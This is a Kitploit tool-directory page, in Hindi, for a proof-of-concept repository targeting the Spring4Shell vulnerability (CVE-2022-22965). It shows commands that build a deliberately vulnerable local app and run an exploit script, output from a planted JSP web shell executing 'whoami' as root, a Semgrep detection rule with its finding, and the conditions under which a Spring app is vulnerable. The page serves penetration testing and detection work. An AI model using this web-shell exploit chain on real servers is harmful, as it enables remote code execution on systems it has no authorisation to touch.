Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
springshell-rce-poc — CVE-2022-22965 - CVE-2010-1622 रेडक्स | Kitploit
उपकरण/GitHubGitHub/dduarte/springshell-rce-poc
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubdduarte/springshell-rce-poc

springshell-rce-poc

CVE-2022-22965 - CVE-2010-1622 रेडक्स

रिपॉजिटरी देखें
191213 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-22965 - कमजोर ऐप और PoC

परीक्षण और त्रुटि

root@kitploit:~
$ docker rm -f rce; docker build -t rce:latest . && docker run -d -p 8080:8080 --name rce rce:latest && sleep 5 && python poc.py

आउटपुट उदाहरण

root@kitploit:~
rce
sha256:f626a2190dc0790c610afd4f12a4b2482b6a726d671fdac1432275de89c07cd6
1a048e5725f754d331de9491d0750c4c7a163472dea1fd1554edccfd00d7f6e5
deploy <Response [200]>
webshell <Response [404]>
webshell <Response [404]>
webshell <Response [404]>
webshell <Response [404]>
webshell <Response [500]>
webshell http://localhost:8080/tomcatwar.jsp?cmd=whoami
root

Semgrep के साथ पहचान

root@kitploit:~
$ semgrep --config=semgrep-rule.yml .

Semgrep नियम और परीक्षण मामले

आउटपुट उदाहरण

root@kitploit:~
Findings:

  src/main/java/com/example/demo/controller/IndexController.java
     cve-2022-22965
        Semgrep found a match


         14┆ @RequestMapping("/index")
         15┆ public void index(EvalBean evalBean) {
         16┆
         17┆ }

Ran 1 rule on 3 files: 1 finding.

कमजोर ऐप की आवश्यकताएँ1

  • JDK 9 या उससे ऊपर
  • WAR डिप्लॉयमेंट के साथ स्टैंडअलोन Tomcat (कोई Embedded Tomcat नहीं)
  • कोई भी Spring संस्करण 5.3.18 / 5.2.20 से पहले (Spring Boot 2.5.12 / 2.6.6 से पहले)
  • WebDataBinder / InitBinder पर कोई ब्लॉकलिस्ट नहीं
  • सीधे POJOs के साथ पैरामीटर बाइंड (कोई @RequestBody, @RequestQuery, आदि नहीं)
  • लिखने योग्य फ़ाइल सिस्टम (जैसे webapps/ROOT)

स्रोत

  • https://twitter.com/vxunderground/status/1509170582469943303 / https://github.com/craig/SpringCore0day
  • https://github.com/fengguangbin/spring-rce-war

Footnotes

  1. ज्ञात PoCs के समान शोषण मानते हुए। अन्य गैजेट भी हो सकते हैं... ↩

टूल डाउनलोड करें